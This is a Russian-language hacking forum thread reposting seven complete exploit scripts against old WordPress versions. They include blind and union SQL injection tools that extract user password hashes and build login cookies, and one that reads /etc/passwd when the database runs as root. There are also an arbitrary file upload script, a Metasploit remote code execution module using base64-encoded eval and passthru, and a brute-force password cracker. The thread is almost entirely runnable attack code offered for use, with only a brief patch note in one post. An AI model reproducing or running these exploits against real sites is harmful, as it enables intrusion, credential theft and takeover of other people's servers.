WordPress
| |
aka_kludge | Дата: Пятница, 05.06.2009, 12:04 | Сообщение # 1 |
Admin
Группа: Администраторы
Сообщений: 1058
Награды: 2
Репутация: 25
Статус: Offline
| Wordpress 2.1.3 admin-ajax.php SQL Injection Blind Fishing Exploit error_reporting(E_ALL); $norm_delay = 0; /////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////// // WordPress 2.1.3 "admin-ajax.php" sql injection blind fishing exploit // written by Janek Vind "waraxe" // http://www.waraxe.us/ // 21. may 2007 /////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////// //===================================================================== $outfile = './warlog.txt';// Log file $url = 'http://localhost/wordpress.2.1.3/wp-admin/admin-ajax.php'; $testcnt = 300000;// Use bigger numbers, if server is slow, default is 300000 $id = 1;// ID of the target user, default value "1" is admin's ID $suffix = '';// Override value, if needed $prefix = 'wp_';// WordPress table prefix, default is "wp_" //====================================================================== echo "Target: $url\n"; echo "sql table prefix: $prefix\n"; if(empty($suffix)) { $suffix = md5(substr($url, 0, strlen($url) - 24)); } echo "cookie suffix: $suffix\n"; echo "testing probe delays \n"; $norm_delay = get_normdelay($testcnt); echo "normal delay: $norm_delay deciseconds\n"; $hash = get_hash(); add_line("Target: $url"); add_line("User ID: $id"); add_line("Hash: $hash"); echo "\nWork finished\n"; echo "Questions and feedback - http://www.waraxe.us/ \n"; die("See ya! \n"); /////////////////////////////////////////////////////////////////////// /////////////////////////////////////////////////////////////////////// function get_hash() { $len = 32; $field = 'user_pass'; $out = ''; echo "finding hash now ...\n"; for($i = 1; $i < $len + 1; $i ++) { $ch = get_hashchar($field,$i); echo "got $field pos $i --> $ch\n"; $out .= "$ch"; echo "current value for $field: $out \n"; } echo "\nFinal result: $field=$out\n\n"; return $out; } /////////////////////////////////////////////////////////////////////// function get_hashchar($field,$pos) { global $prefix, $suffix, $id, $testcnt; $char = ''; $cnt = $testcnt * 4; $ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh'; $ipattern = " UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(ORD(SUBSTRING($field,$pos,1))%s,BENCHMARK($cnt,MD5(1337)),3)/*"; // First let's determine, if it's number or letter $inj = sprintf($ipattern, $prefix, $id, ">57"); $post = sprintf($ppattern, $suffix, $inj, $suffix); $letter = test_condition($post); if($letter) { $min = 97; $max = 102; echo "char to find is [a-f]\n"; } else { $min = 48; $max = 57; echo "char to find is [0-9]\n"; } $curr = 0; while(1) { $area = $max - $min; if($area < 2 ) { $inj = sprintf($ipattern, $prefix, $id, "=$max"); $post = sprintf($ppattern, $suffix, $inj, $suffix); $eq = test_condition($post); if($eq) { $char = chr($max); } else { $char = chr($min); } break; } $half = intval(floor($area / 2)); $curr = $min + $half; $inj = sprintf($ipattern, $prefix, $id, ">$curr"); $post = sprintf($ppattern, $suffix, $inj, $suffix); $bigger = test_condition($post); if($bigger) { $min = $curr; } else { $max = $curr; } echo "curr: $curr--$max--$min\n"; } return $char; } /////////////////////////////////////////////////////////////////////// function test_condition($p) { global $url, $norm_delay; $bret = false; $maxtry = 10; $try = 1; while(1) { $start = getmicrotime(); $buff = make_post($url, $p); $end = getmicrotime(); if($buff === '-1') { break; } else { echo "test_condition() - try $try - invalid return value ...\n"; $try ++; if($try > $maxtry) { die("too many tries - exiting ...\n"); } else { echo "trying again - try $try ...\n"; } } } $diff = $end - $start; $delay = intval($diff * 10); if($delay > ($norm_delay * 2)) { $bret = true; } return $bret; } /////////////////////////////////////////////////////////////////////// function get_normdelay($testcnt) { $fa = test_md5delay(1); echo "$fa\n"; $sa = test_md5delay($testcnt); echo "$sa\n"; $fb = test_md5delay(1); echo "$fb\n"; $sb = test_md5delay($testcnt); echo "$sb\n"; $fc = test_md5delay(1); echo "$fc\n"; $sc = test_md5delay($testcnt); echo "$sc\n"; $mean_nondelayed = intval(($fa + $fb + $fc) / 3); echo "mean nondelayed - $mean_nondelayed dsecs\n"; $mean_delayed = intval(($sa + $sb + $sc) / 3); echo "mean delayed - $mean_delayed dsecs\n"; return $mean_delayed; } /////////////////////////////////////////////////////////////////////// function test_md5delay($cnt) { global $url, $id, $prefix, $suffix; // delay in deciseconds $delay = -1; $ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh'; $ipattern = ' UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(LENGTH(user_pass)>31,BENCHMARK(%d,MD5(1337)),3)/*'; $inj = sprintf($ipattern, $prefix, $id, $cnt); $post = sprintf($ppattern, $suffix, $inj, $suffix); $start = getmicrotime(); $buff = make_post($url, $post); $end = getmicrotime(); if(intval($buff) !== -1) { die("test_md5delay($cnt) - invalid return value, exiting ..."); } $diff = $end - $start; $delay = intval($diff * 10); return $delay; } /////////////////////////////////////////////////////////////////////// function getmicrotime() { list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec); } /////////////////////////////////////////////////////////////////////// function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE) { $ch = curl_init(); $timeout = 120; curl_setopt ($ch, CURLOPT_URL, $url); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0); curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)'); if(!empty($cookie)) { curl_setopt ($ch, CURLOPT_COOKIE, $cookie); } if(!empty($referer)) { curl_setopt ($ch, CURLOPT_REFERER, $referer); } if($headers === TRUE) { curl_setopt ($ch, CURLOPT_HEADER, TRUE); } else { curl_setopt ($ch, CURLOPT_HEADER, FALSE); } $fc = curl_exec($ch); curl_close($ch); return $fc; } /////////////////////////////////////////////////////////////////////// function add_line($buf) { global $outfile; $buf .= "\n"; $fh = fopen($outfile, 'ab'); fwrite($fh, $buf); fclose($fh); } /////////////////////////////////////////////////////////////////////// ?>
|
|
| |
aka_kludge | Дата: Пятница, 05.06.2009, 12:05 | Сообщение # 2 |
Admin
Группа: Администраторы
Сообщений: 1058
Награды: 2
Репутация: 25
Статус: Offline
| WordPress 2.2 (wp-app.php) Arbitrary File Upload Exploit #! /usr/bin/env perl # Wordpress 2.2 and Wordpress MU <= 1.2.2 Arbitrary File Upload PoC # # Credits : Alexander Concha # Website : http://www.buayacorp.com/ # Advisory: http://www.buayacorp.com/files/wordpress/wordpress-advisory.html use Digest::MD5 qw(md5_hex); use LWP::UserAgent; my $ua = new LWP::UserAgent; my $blog = $ARGV[0]; my $user = $ARGV[1]; my $pass = $ARGV[2]; my $remote_file = $ARGV[3]; my $local_file = $ARGV[4]; my $post_id = $ARGV[5]; if (@ARGV < 4) { print "\nUsage:\n"; print " wp-file-upload.pl [local_file] [post_id]\n\n"; print " - full path to WordPress. http://victim.com/wordpress/ \n"; print " - valid username with any of these roles: author, editor, administrator\n"; print " - valid password for the user\n"; print " - full path to the remote file. /home/vulnerable.com/wordpress/wp-content/uploads/foo.php\n"; print " [local_file] - file to upload\n"; print " [post_id] - every time this script is executed creates a new post, specify a post_ID if you already run it\n\n"; exit(); } $ua->requests_redirectable([]); $blog =~ s/\/*$/\//; $url = 'wp-app.php'; if ( 200 != $ua->head($url . '?action=/service')->code ) { $url = 'app.php'; die "\nIt seems that this WP installation is not vulnerable: app.php and wp-app.php were not found.\n" unless 200 == $ua->head($url . '?action=/service')->code; } $auth_cookie = get_auth_cookie(); sub LWP::UserAgent::simple_request { my($self, $request, $arg, $size) = @_; $request->header('Cookie' => $auth_cookie); $request->content_type('image/gif') if $request->method eq "PUT"; $request->uri($blog . $request->uri); $self->_request_sanity_check($request); my $new_request = $self->prepare_request($request); $response = $self->send_request($new_request, $arg, $size); print $request->method . " " . $request->uri . " " . $response->code . "\n"; return $response; } sub get_contents { $file = shift; if ( -e $file ) { open FILE, $file or die("Invalid local file"); $file = join('', ); close FILE; } else { $file = < PHP } return $file; } sub get_auth_cookie { $response = $ua->head('wp-login.php?logout'); if ( $response->headers->header('Set-Cookie') =~ m/wordpress(user|pass)(.*?)=/ ) { return "wordpressuser$2=$user;wordpresspass$2=".md5_hex(md5_hex($pass)); } return ''; } if (0 == $post_id) { $response = $ua->get('wp-admin/post-new.php'); die ("\nInvalid credentials or blog url.\n\n" . $response->as_string) unless 200 == $response->code; if ( $response->content =~ m/name=._wpnonce. value=.([a-z\d]{10})./ ) { $response = $ua->post('wp-admin/post.php', [ '_wpnonce' => $1, 'action' => 'post', 'post_ID' => $post_id, 'post_type' => 'post', 'post_title' => 'foo', 'metakeyselect' => '#NONE#', 'metakeyinput' => '_wp_attached_file', 'metavalue' => $remote_file ], 'Cookie' => $auth_cookie); # Checks for post-new.php?posted=post_ID if ( $response->headers->header('Location') =~ m/posted=(\d+)/ ) { $post_id = $1; } } } die "\nCould not get a valid post_id value.\n" unless 0 != $post_id; $request = HTTP::Request->new(PUT => $url . '?action=/attachment/file/'.$post_id); $request->content(get_contents($local_file)); $response = $ua->request($request); if ( 200 == $response->code ) { print "\nIt seems that the file has been posted successfully... :P\n"; print "Use the following value to update the remote file: post_id '$post_id'\n"; } else { print "\nError: there is no attachment metadata for post_id=$post_id\n\n" . $response->as_string() . "\n"; }
|
|
| |
aka_kludge | Дата: Пятница, 05.06.2009, 12:06 | Сообщение # 3 |
Admin
Группа: Администраторы
Сообщений: 1058
Награды: 2
Репутация: 25
Статус: Offline
| Wordpress 2.2 (xmlrpc.php) Remote SQL Injection Exploit /* El error, bastante tonto por cierto, se encuentra en la función wp_suggestCategories, en el archivo xmlrpc.php: function wp_suggestCategories($args) { global $wpdb; $this->escape($args); $blog_id = (int) $args[0]; $username = $args[1]; $password = $args[2]; $category = $args[3]; $max_results = $args[4]; if(!$this->login_pass_ok($username, $password)) { return($this->error); } // Only set a limit if one was provided. $limit = ""; if(!empty($max_results)) { $limit = "LIMIT {$max_results}"; } $category_suggestions = $wpdb->get_results(" SELECT cat_ID category_id, cat_name category_name FROM {$wpdb->categories} WHERE cat_name LIKE '{$category}%' {$limit} "); return($category_suggestions); } Como se puede observar en la porción de código, no se hace una conversión a entero del valor de $max_results, por lo que es posible enviar valores del tipo 0 UNION ALL SELECT user_login, user_pass FROM wp_users. Para que un atacante logre su objetivo, es necesario que éste tenga una cuenta de usuario válida (una cuenta de tipo suscriber basta y sobra) en el sitio víctima. Preparé un pequeño exploit (Creditos: Alex) que devuelve la lista de usuarios con sus respectivas contraseñas en MD5, además también incluye las cookies de autenticación para cada usuario. Credits: Alex de la Concha code c sharp: */ using System; using System.Net; using System.Text; using System.Xml; using System.Text.RegularExpressions; using System.Security.Cryptography; class Program { static void Main(string[] args) { string targetUrl = "http://localhost/wp/"; string login = "alex"; string password = "1234"; string data = @" wp.suggestCategories 1 {0} {1} 1 0 UNION ALL SELECT user_login, user_pass FROM {2}users "; string cookieHash = GetCookieHash(targetUrl); using (WebClient request = new WebClient()) { /* Probar con el prefijo por omisión */ string response = request.UploadString(targetUrl + "xmlrpc.php", string.Format(data, login, password, "wp_svn_")); /* Se hace una nueva petición si la consulta anterior falla */ Match match = Regex.Match(response, @"FROM\s+(.*?)categories\s+"); if (match.Success) { response = request.UploadString(targetUrl + "xmlrpc.php ", string.Format(data, login, password, match.Groups[1].Value)); } try { XmlDocument doc = new XmlDocument(); doc.LoadXml(response); XmlNodeList nodes = doc.SelectNodes("//struct/member/value"); if (nodes != null && doc.SelectSingleNode("/methodResponse/fault") == null) { string user, pass; /* Mostrar lista de: * Usuario md5(contraseña) * Cookie de Autenticación * */ for (int i = 0; i < nodes.Count / 2 + 1; i += 2) { user = nodes.Item(i).InnerText; pass = nodes.Item(i + 1).InnerText; Console.WriteLine("Usuario: {0}\tMD5(Contraseña): {1}", user, pass); Console.WriteLine("Cookie: wordpressuser_{0}={1};wordpresspass_{0}={2}\n", cookieHash, user, MD5(pass)); } } else { Console.WriteLine("Error:\n{0}", response); } } catch (Exception ex) { Console.WriteLine("Error:\n" + ex.ToString()); } } } private static string GetCookieHash(string targetUrl) { WebRequest request = WebRequest.Create(targetUrl + "wp-login.php?action=logout"); request.Method = "HEAD"; (request as HttpWebRequest).AllowAutoRedirect = false; WebResponse response = request.GetResponse(); if (response != null) { Match match = Regex.Match(response.Headers["Set-Cookie"], @"wordpress[a-z]+_([a-z\d]{32})", RegexOptions.IgnoreCase); if (match.Success) return match.Groups[1].Value; } return string.Empty; } public static string MD5(string password) { MD5CryptoServiceProvider x = new MD5CryptoServiceProvider(); byte[] bs = Encoding.UTF8.GetBytes(password); bs = x.ComputeHash(bs); StringBuilder s = new StringBuilder(); foreach (byte b in bs) { s.Append(b.ToString("x2").ToLower()); } return s.ToString(); } } /* Para corregir este problema, mientras liberan actualizaciones para Wordpress 2.2, es editar el archivo xmlrpc.php y cambiar la línea $max_results = $args[4]; de la función wp_suggestCategories por $max_results = (int) $args[4]; o en su defecto bloquear el acceso a xmlrpc.php. o malo esque tienes que tener una cuenta aunque sea con los minimos permisos para obtener los demas nombres de users con sus respectivos MD5. static void Main(string[] args) { string targetUrl = "http://localhost/wp/"; string login = "alex"; string password = "1234"; hay seria la ruta donde esta colocado el wordpress 2.2, tu nombre de usuario y tu password. Ya se creo un zip con los archivos vulnerables ya reparados [ xmlrpc.php, wp-admin/post-new.php, wp-admin/page-new.php , wp-admin/users-edit.php. ] :: [Slappter] :: */
|
|
| |
aka_kludge | Дата: Пятница, 05.06.2009, 12:07 | Сообщение # 4 |
Admin
Группа: Администраторы
Сообщений: 1058
Награды: 2
Репутация: 25
Статус: Offline
| Wordpress 2.1.2 (xmlrpc) Remote SQL Injection Exploit #!/usr/bin/perl -w #Wordpress 2.1.2 SQL Injection POC #Credits: sid@notsosecure.com #Thanks to ferruh (ferruh@mavituna.com)for improving my exploitation skills #website:www.notsosecure.com #Wordpress version 2.1.2 is vulnerable to sql injection. This POC works when exploting with the credentials of a valid user. The user can belong to 'contributor' role or any higher role. Versions before 2.1.2 have not been tested but are most likely to be vulnerable as well. #Example:--------------------------------------------------------------------------------------- #C:\wp-xmlrpc-2-2-sql.pl" http://192.168.2.4/apache2-default/wordpress/ author author 5 # # The usage is correct # Trying Host http://192.168.2.4/apache2-default/wordpress/ ... #[+] The xmlrpc-2-2 server seems to be working #-------------------- #Username for id = 1 is:--> admin # #Md5 hash for user: admin # #is: 21232f297a57a5a743894a0e4a801fc3 # #-------------------- #Username for id = 2 is:--> contri # #Md5 hash for user: contri # #is: 95a178dde9d3fa2bde4971f10d3acc3e # #-------------------- #Username for id = 3 is:--> author # #Md5 hash for user: author # #is: 02bd92faa38aaa6cc0ea75e59937a1ef # #----------------------- #Total Number of Users found:-->3 #----------------------- #Mysql is running as: root@localhost # #Encrypted password for: root@localhost # is: root@localhost67457e226a1a15bd # #This deserves no mercy.... Lets get the /etc/passwd #.......imho...Here is the /etc/passwd file: #root:x:0:0:root:/root:/bin/bash #daemon:x:1:1:daemon:/usr/sbin:/bin/sh #bin:x:2:2:bin:/bin:/bin/sh #sys:x:3:3:sys:/dev:/bin/sh #sync:x:4:65534:sync:/bin:/bin/sync #games:x:5:60:games:/usr/games:/bin/sh #man:x:6:12:man:/var/cache/man:/bin/sh #lp:x:7:7:lp:/var/spool/lpd:/bin/sh #mail:x:8:8:mail:/var/mail:/bin/sh #news:x:9:9:news:/var/spool/news:/bin/sh #uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh #proxy:x:13:13:proxy:/bin:/bin/sh #www-data:x:33:33:www-data:/var/www:/bin/sh #backup:x:34:34:backup:/var/backups:/bin/sh #list:x:38:38:Mailing List Manager:/var/list:/bin/sh #gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh #messagebus:x:100:103::/var/run/dbus:/bin/false #postgres:x:101:105:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash #haldaemon:x:103:109:Hardware abstraction layer,,,:/home/haldaemon:/bin/false #gdm:x:104:112:Gnome Display Manager:/var/lib/gdm:/bin/false #mysql:x:105:113:MySQL Server,,,:/var/lib/mysql:/bin/false #sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin #snort:x:107:115:Snort IDS:/var/log/snort:/bin/false #postfix:x:108:116::/var/spool/postfix:/bin/false #stunnel4:x:109:118::/var/run/stunnel4:/bin/false #arpwatch:x:111:120:ARP Watcher,,,:/var/lib/arpwatch:/bin/sh #statd:x:112:65534::/var/lib/nfs:/bin/false #sfs:x:113:121::/var/lib/sfs:/bin/false #ftp:x:114:65534::/home/ftp:/bin/false #Debian-exim:x:115:122::/var/spool/exim4:/bin/false #telnetd:x:116:123::/nonexistent:/bin/false #------------------------------------------------------------------------------------------------------- #use warnings; use LWP::UserAgent; my $ua = new LWP::UserAgent; $ua->agent("Wordpress Hash Grabber v2.0" . $ua->agent); my $host = $ARGV[0]; # The path to xmlrpc.php my $username= $ARGV[1];#username my $password= $ARGV[2];#password my $postid= $ARGV[3];#post id which the user can edit my $pref = 'wp_'; # database prefix! my $hash_pass=""; #$root='root@localhost.com'; if (@ARGV < 4) { print " -----------------------------------------------------------------------\n"; print " wp-xmlrpc-sql.pl - Wordpress xmlrpc.php 'post_id' sql injection exploit\n Version 2.1.2"; print " by NotSoSecure // www.notsosecure.com \n"; print " coded by sid //sid\@notsosecure.com // 31.03.2007\n"; print " ------------------------------------------------------------------------\n"; print " Usage:\n"; print " wp-xmlrpc-sql.pl \n"; print "\n"; print " - host for attack\n full path eg. http://192.168.1.4/wordpress/ "; print " - valid username, can be in any of these role: contributor, author, editor \n"; print " - valid password for the user\n"; print " - valid post_id which the user can edit\n"; print " ------------------------------------------------------------------------\n"; exit(); } print "\n The usage is correct\n Trying Host $host ...\n"; my $res = $ua->get($host.'/xmlrpc.php'); if ( $res->content =~ /XML-RPC server accepts POST requests only/is ) { print "[+] The xmlrpc server seems to be working \n"; } else { print "--------------------\n"; print "[error]--> Something seems to be wrong with the xmlrpc.php \nCheck the full path to xmlrpc.php again\n "; # Sloppy way of debugging, remove if you want open(LOG, ">wp_out.html"); print LOG $res->content; exit; } for ($i=1; $i<=100 ;$i++) { #bug: if a user has been deleted the corresponding id will be missing. #change this to point to the known ids or the usernames, or just make it go for top 100 ids #obtaining usernames and userid my $sql = "mt.setPostCategories ".$postid." union all select user_login from wp_users where id=".$i." ".$username." ".$password." categoryId 1 categoryName Uncategorized isPrimary 0 "; my $req = new HTTP::Request POST => $host . "/xmlrpc.php"; $req->content($sql); $res = $ua->request($req); $out = $res->content; if($out=~ /Bad login\/pass combination/) { print "--------------------\n"; print "[error]-->Invalid username/password conbination\n"; exit; } if($out=~ /Sorry, you can not edit this post/) { print "--------------------\n"; print "[error]-->INVALID postid \n Supply a post id which can be edited by this user.\n"; exit; } if ($out =~ /DELETE FROM wp_post2cat/) { #print "found"; print "--------------------\n"; @result2=split(/category_id =/,$out); #to do: remove the assumption that username is less than 10 char $final=substr($result2[1],1,10); print "Username for id = ".$i." is:--> ".$final."\n"; no warnings; #obtaining md5 hash for the username my $sql2 = "mt.setPostCategories ".$postid." union all select user_pass from wp_users where id=".$i." ".$username." ".$password." categoryId 1 categoryName Uncategorized isPrimary 0 "; my $req2 = new HTTP::Request POST => $host . "/xmlrpc.php"; $req2->content($sql2); $res2 = $ua->request($req2); $out2 = $res2->content; @result3=split(/category_id =/,$out2); $hash=substr($result3[1],1,33); print "Md5 hash for user: ".$final." \nis: ".$hash."\n"; } else { print "-----------------------\n"; print "Total Number of Users found:-->".($i-1)."\n"; print "-----------------------\n"; #lets find wat the db is running as: my $sql2 = "mt.setPostCategories ".$postid." union all select user() ".$username." ".$password." categoryId 1 categoryName Uncategorized isPrimary 0 "; my $req2 = new HTTP::Request POST => $host . "/xmlrpc.php"; $req2->content($sql2); $res2 = $ua->request($req2); $out2 = $res2->content; @result3=split(/category_id =/,$out2); $hash_user=substr($result3[1],1,20); print "Mysql is running as: ".$hash_user."\n"; #lets get the password hash of the db_user for offline cracking #buggy code my $sql3 = "mt.setPostCategories ".$postid." union all select concat(user(),mysql.user.Password) from mysql.user where user=user() ".$username." ".$password." categoryId 1 categoryName Uncategorized isPrimary 0 "; my $req3 = new HTTP::Request POST => $host . "/xmlrpc.php"; $req3->content($sql3); $res3 = $ua->request($req3); $out3 = $res3->content; my $hash_pass=""; #print $out3; if ($out3=~m/SELECT command denied to user/) { print "Cant get the password for this user, \nPermission Denied, Thats better security!!"; exit;} else{ @result3=split(/category_id =/,$out3); $hash_pass=substr($result3[1],1,30); print $hash_pass; if ($hash_pass eq "") { print "No Password set"; } else{ print "Encrypted password for: ".$hash_user."\n is ".$hash_pass."\n"; } #IF database is running as root, lets rip it apart if ($hash_user =~m/root/) { print"\nThis deserves no mercy....\n Lets get the /etc/passwd\n.......imho...\n\n"; my $sql4 = "mt.setPostCategories ".$postid." union all select load_file(0x2f6574632f706173737764) ".$username." ".$password." categoryId 1 categoryName Uncategorized isPrimary 0 "; my $req2 = new HTTP::Request POST => $host . "/xmlrpc.php"; $req2->content($sql4); $res2 = $ua->request($req2); $out2 = $res2->content; @result3=split(/category_id =/,$out2); $hash=substr($result3[1],1,1600); print "Here is the /etc/passwd file:\n\n\n"; print $hash; } exit; } } }
|
|
| |
aka_kludge | Дата: Пятница, 05.06.2009, 12:07 | Сообщение # 5 |
Admin
Группа: Администраторы
Сообщений: 1058
Награды: 2
Репутация: 25
Статус: Offline
| Wordpress <= 1.5.1.3 Remote Code Execution eXploit (metasploit) ## # Title: Wordpress <= 1.5.1.3 Remote Code Execution eXploit (metasploit) # Name: php_wordpress.pm # License: Artistic/BSD/GPL # Info: I lub metasploit yummmm (str0ke ! milw0rm.com). # # Recoded Kartoffelguru's php code for metasploit. I love cookies. /str0ke # # # # - This is an exploit module for the Metasploit Framework, please see # http://metasploit.com/projects/Framework for more information. # ## package Msf::Exploit::php_wordpress; use base "Msf::Exploit"; use strict; use Pex::Text; use bytes; my $advanced = { }; my $info = { 'Name' => 'Wordpress <= 1.5.1.3 Remote Code Execution eXploit', 'Version' => '$Revision: 1.0 $', 'Authors' => [ 'str0ke' ], 'Arch' => [ ], 'OS' => [ ], 'Priv' => 0, 'UserOpts' => { 'RHOST' => [1, 'ADDR', 'The target address'], 'RPORT' => [1, 'PORT', 'The target port', 80], 'VHOST' => [0, 'DATA', 'The virtual host name of the server'], 'RPATH' => [1, 'DATA', 'Path WordPress root directory', '/'], 'SSL' => [0, 'BOOL', 'Use SSL'], }, 'Description' => Pex::Text::Freeform(qq{ This module exploits a code execution exploit in wordpress blog <= 1.5.1.3. }), 'Refs' => [ ['MIL', '1142'], ], 'Payload' => { 'Space' => 512, 'Keys' => ['cmd', 'cmd_bash'], }, 'Keys' => ['wordpress'], }; sub new { my $class = shift; my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); return($self); } sub Exploit { my $self = shift; my $target_host = $self->GetVar('RHOST'); my $target_port = $self->GetVar('RPORT'); my $vhost = $self->GetVar('VHOST') || $target_host; my $path = $self->GetVar('RPATH'); my $cmd = $self->GetVar('EncodedPayload')->RawPayload; my $encoded = Pex::Text::Base64Encode("passthru(\"$cmd\");"); $encoded =~ s/\n//gm; my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $encoded)); $byte.=".chr(32)"; my $str = Pex::Text::Base64Encode('args[0]=eval(base64_decode('.$byte.')).die()&args[1]=x'); $str =~ s/\n//gm; my $data = "wp_filter[query_vars][0][0][function]=get_lastpostdate;wp_filter[query_vars][0][0][accepted_args]=0;". "wp_filter[query_vars][0][1][function]=base64_decode;wp_filter[query_vars][0][1][accepted_args]=1;". "cache_lastpostmodified[server]=//e;cache_lastpostdate[server]=$str". ";wp_filter[query_vars][1][0][function]=parse_str;wp_filter[query_vars][1][0][accepted_args]=1;". "wp_filter[query_vars][2][0][function]=get_lastpostmodified;wp_filter[query_vars][2][0][accepted_args]=0;". "wp_filter[query_vars][3][0][function]=preg_replace;wp_filter[query_vars][3][0][accepted_args]=3;"; my $req = "GET $path HTTP/1.0\r\n". "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)\r\n". "Host: $vhost:$target_port\r\n". "Pragma: no-cache\r\n". "Accept: */*\r\n". "Cookie: $data\r\n". "\r\n"; my $s = Msf::Socket::Tcp->new( 'PeerAddr' => $target_host, 'PeerPort' => $target_port, 'LocalPort' => $self->GetVar('CPORT'), 'SSL' => $self->GetVar('SSL'), ); if ($s->IsError){ $self->PrintLine(' Error creating socket: ' . $s->GetError); return; } $self->PrintLine(" Sending the malicious WordPress Get request..."); $s->Send($req); my $results = $s->Recv(-1, 20); $s->Close(); $self->PrintLine($results); return; } 1;
|
|
| |
aka_kludge | Дата: Пятница, 05.06.2009, 12:09 | Сообщение # 6 |
Admin
Группа: Администраторы
Сообщений: 1058
Награды: 2
Репутация: 25
Статус: Offline
| WordPress <= 1.5.1.1 SQL Injection Exploit #!/usr/bin/perl -w # # SQL Injection Exploit for WordPress <= 1.5.1.1 # This exploit shows the username of the administrator of the blog and his # password crypted in MD5, you must only choose the correct version of the target # Related advisory: http://www.gentoo.org/security/en/glsa/glsa-200506-04.xml # Patch: download the last version at http://wordpress.org/download/ # Coded by Alberto Trivero use LWP::Simple; print "\n\t====================================\n"; print "\t= Exploit for WordPress <= 1.5.1.1 =\n"; print "\t= by Alberto Trivero =\n"; print "\t====================================\n\n"; if(!$ARGV[0] or !($ARGV[0]=~m/http/) or !($ARGV[1]==1 or $ARGV[1]==2)) { print "Usage:\nperl $0 [full_target_path] [target_version: 1 OR 2]\nVersion 1: WordPress <= 1.5\nVersion 2: WordPress 1.5.1 - 1.5.1.1\n\n"; print "Examples:\nperl $0 http://www.example.com/wordpress/ 2\n"; exit(0); } $page=get($ARGV[0]."index.php?cat=%2527%20UNION%20SELECT%20CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58))%20FROM%20wp_users/*") || die "[-] Unable to retrieve: $!" if($ARGV[1]==1); $page=get($ARGV[0]."index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/*") || die "[-] Unable to retrieve: $!" if($ARGV[1]==2); print "[+] Connected to: $ARGV[0]\n"; $page=~m/:([a-f0-9]{32}):(.*?):/; print "[+] Username of administrator is: $2\n" if($2); print "[+] MD5 hash of password is: $1\n" if($1); print "[-] Unable to retrieve username\n" if(!$2); print "[-] Unable to retrieve hash of password\n" if(!$1);
|
|
| |
aka_kludge | Дата: Пятница, 05.06.2009, 12:12 | Сообщение # 7 |
Admin
Группа: Администраторы
Сообщений: 1058
Награды: 2
Репутация: 25
Статус: Offline
| Wordpress <= 2.x dictionnary & Bruteforce attack ############## Source code ##################### #!usr/bin/python # Flaw found on Wordpress # that allow Dictionnary & Bruteforce attack # Greetz goes to : NeoMorphS, Tiky # Vendor : http://wordpress.org/ # Found by : Kad (kadfrox (at) gmail (dot) com [email concealed] / #kadaj-diabolik (at) hotmail (dot) fr [email concealed]) import urllib , urllib2, sys, string tab = "%s%s%s"%( string.ascii_letters, string.punctuation, string.digits ) tab = [ i for i in tab ] def node( table, parent, size ): if size == 0: pass else: for c in table: string = "%s%s"%( parent, c ) data = {'log': sys.argv[2], 'pwd': string} print "[+] Testing : "+string request = urllib2.Request(server, urllib.urlencode(data)) f = urllib2.urlopen(request).read() if not "Incorrect password." in f: print "[!] Password is : "+mot ; break node( table, string, size-1 ) def bruteforce( table, size ): for c in table: node( table, c, size-1 ) if (len(sys.argv) < 3): print "Usage : float.py " print "\nDefault: User is 'admin'" print "Choice : 1} Dictionnary Attack, use dictionnary file" print " 2} Bruteforce Attack, use number of character for password" else: server = sys.argv[1] if sys.argv[3] == "1": a , b = open(sys.argv[4],'r') , 0 for lines in a: b = b + 1 a.seek(0) c = 0 while (c < b): mot = a.readline().rstrip() data = {'log': sys.argv[2], 'pwd': mot} print "[+] Testing : "+mot request = urllib2.Request(server, urllib.urlencode(data)) f = urllib2.urlopen(request).read() if not "Incorrect password." in f: print "[!] Password is : "+mot ; break else: c = c + 1 ; pass if sys.argv[3] == "2": print "[-] Server is : "+server print "[-] User is : "+sys.argv[2] print "[-] Number of characters are : "+sys.argv[4] number = int(sys.argv[4]) bruteforce( tab, number ) ############## Source code ##################### The problem is : many time, the default user who is created is : admin, then you can try to crack the password, to stop that, you can use image confirmation or a limit for the connection (for example, only 5 tests). To know if "admin" is the default user, you can try to go to the login page : http://site.com/wp-login.php and you try ; login : admin, pass : test (or anything else). if "Wrong password" is printed on the page, the default user is admin, but if there is : "Wrong Username" then it's not the default password Kad'
|
|
| |
Профиль | Информация | Управление |
|
| Сегодня: 2, 02.01.2025, 19:43 Вы используете: " v " ВаШ внешний IP: "3.144.41.252" | У вас новых личных сообщений ·
Мой профиль | Выход
|
|
|
|
|
|
... |
|
|
|
Пользователи |
|
|
|
Поиск |
|
|
|